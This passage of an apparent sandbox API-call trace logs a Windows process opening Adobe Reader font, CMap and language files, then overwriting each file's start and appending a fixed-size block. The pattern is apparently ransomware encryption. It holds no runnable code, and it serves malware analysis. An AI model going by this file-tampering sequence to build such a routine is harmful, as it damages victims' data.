(dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0092.582] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.582] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.583] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-KSCpc-EUC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-kscpc-euc")) returned 0x20 [0092.583] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UTF16-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unigb-utf16-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.583] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UTF16-V", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UTF16-V", lpFilePart=0x2d5f690*="UniGB-UTF16-V") returned 0x44 [0092.583] GetLastError () returned 0x5 [0092.583] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0092.583] LocalFree (hMem=0x69e2b0) returned 0x0 [0092.583] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0092.583] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0092.583] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0095.598] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0095.598] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UTF16-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unigb-utf16-v")) returned 0x20 [0095.599] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS2004-UTF16-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis2004-utf16-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.599] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS2004-UTF16-V", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS2004-UTF16-V", lpFilePart=0x2d5f690*="UniJIS2004-UTF16-V") returned 0x49 [0095.599] GetLastError () returned 0x5 [0095.599] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0095.600] LocalFree (hMem=0x69e2b0) returned 0x0 [0095.600] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0095.600] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0095.601] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0095.601] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0095.601] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS2004-UTF16-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis2004-utf16-v")) returned 0x20 [0095.602] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-Italic.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-italic.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0095.602] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0095.602] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x3dce0 [0095.603] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0095.603] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0095.603] ReleaseMutex (hMutex=0x168) returned 1 [0095.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeArabic-Italic.otf", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0095.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeArabic-Italic.otf", cchWideChar=22, lpMultiByteStr=0x1f88b2c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeArabic-Italic.otf", lpUsedDefaultChar=0x0) returned 22 [0095.603] ReadFile (in: hFile=0x1f8, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0095.605] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3cce0 [0095.605] ReadFile (in: hFile=0x1f8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0095.606] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3cce0 [0095.607] WriteFile (in: hFile=0x1f8, lpBuffer=0x26956e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0095.608] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0095.608] WriteFile (in: hFile=0x1f8, lpBuffer=0x2897978*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2897978*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0095.608] CloseHandle (hObject=0x1f8) returned 1 [0095.609] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-BoldItalic.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-bolditalic.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0095.610] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0095.610] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x112a4 [0095.610] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0095.610] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0095.610] ReleaseMutex (hMutex=0x168) returned 1 [0095.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeThai-BoldItalic.otf", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0095.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeThai-BoldItalic.otf", cchWideChar=24, lpMultiByteStr=0x1f8fedc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeThai-BoldItalic.otf", lpUsedDefaultChar=0x0) returned 24 [0095.611] ReadFile (in: hFile=0x1f8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0095.613] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x102a4 [0095.613] ReadFile (in: hFile=0x1f8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0095.614] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x102a4 [0095.614] WriteFile (in: hFile=0x1f8, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0095.614] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0095.614] WriteFile (in: hFile=0x1f8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0095.615] CloseHandle (hObject=0x1f8) returned 1 [0095.615] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-BoldIt.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-boldit.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0095.615] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0095.616] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x43898 [0095.616] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0095.616] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0095.616] ReleaseMutex (hMutex=0x168) returned 1 [0095.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MinionPro-BoldIt.otf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0095.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MinionPro-BoldIt.otf", cchWideChar=20, lpMultiByteStr=0x1f88b2c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MinionPro-BoldIt.otf", lpUsedDefaultChar=0x0) returned 20 [0095.616] ReadFile (in: hFile=0x1f8, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0095.618] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x42898 [0095.618] ReadFile (in: hFile=0x1f8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0095.620] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x42898 [0095.621] WriteFile (in: hFile=0x1f8, lpBuffer=0x26956e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0095.621] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0095.621] WriteFile (in: hFile=0x1f8, lpBuffer=0x2897978*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2897978*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0095.621] CloseHandle (hObject=0x1f8) returned 1 [0095.622] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zx______.pfm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\zx______.pfm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0095.622] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0095.623] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2ab [0095.623] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0095.623] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0095.623] ReleaseMutex (hMutex=0x168) returned 1 [0095.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zx______.pfm", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zx______.pfm", cchWideChar=12, lpMultiByteStr=0x1f7328c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="zx______.pfm", lpUsedDefaultChar=0x0) returned 12 [0095.623] ReadFile (in: hFile=0x1f8, lpBuffer=0x2695708, nNumberOfBytesToRead=0x2ab, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2695708*, lpNumberOfBytesRead=0x2d5f2bc*=0x2ab, lpOverlapped=0x0) returned 1 [0095.625] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0095.625] WriteFile (in: hFile=0x1f8, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x833, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x833, lpOverlapped=0x0) returned 1 [0095.625] CloseHandle (hObject=0x1f8) returned 1 [0095.625] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_DZ.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_dz.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0095.628] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0095.629] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6c96 [0095.629] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0095.629] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0095.629] ReleaseMutex (hMutex=0x168) returned 1 [0095.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_DZ.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0095.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_DZ.txt", cchWideChar=30, lpMultiByteStr=0x1f8fedc, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ar_DZ.txt", lpUsedDefaultChar=0x0) returned 30 [0095.629] ReadFile (in: hFile=0x1f8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0095.632] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5c96 [0095.632] ReadFile (in: hFile=0x1f8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0095.634] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5c96 [0095.634] WriteFile (in: hFile=0x1f8, lpBuffer=0x288ce18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ce18*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0095.635] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0095.635] WriteFile (in: hFile=0x1f8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0095.635] CloseHandle (hObject=0x1f8) returned 1 [0095.635] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_MA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ma.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0095.636] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0095.636] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6c96 [0095.637] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0095.637] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0095.637] ReleaseMutex (hMutex=0x168) returned 1 [0095.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_MA.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0095.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_MA.txt", cchWideChar=30, lpMultiByteStr=0x1f8fedc, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ar_MA.txt", lpUsedDefaultChar=0x0) returned 30 [0095.637] ReadFile (in: hFile=0x1f8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0095.642] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5c96 [0095.643] ReadFile (in: hFile=0x1f8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.308] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5c96 [0096.308] WriteFile (in: hFile=0x1f8, lpBuffer=0x26956e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0096.309] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0096.309] WriteFile (in: hFile=0x1f8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0096.309] CloseHandle (hObject=0x1f8) returned 1 [0096.309] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.bg.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.bg.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0096.720] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0097.670] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6cde [0097.670] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0097.670] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.670] ReleaseMutex (hMutex=0x168) returned 1 [0097.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.bg.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0097.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.bg.txt", cchWideChar=27, lpMultiByteStr=0x1f8fd5c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.bg.txt", lpUsedDefaultChar=0x0) returned 27 [0097.671] ReadFile (in: hFile=0x1f8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, 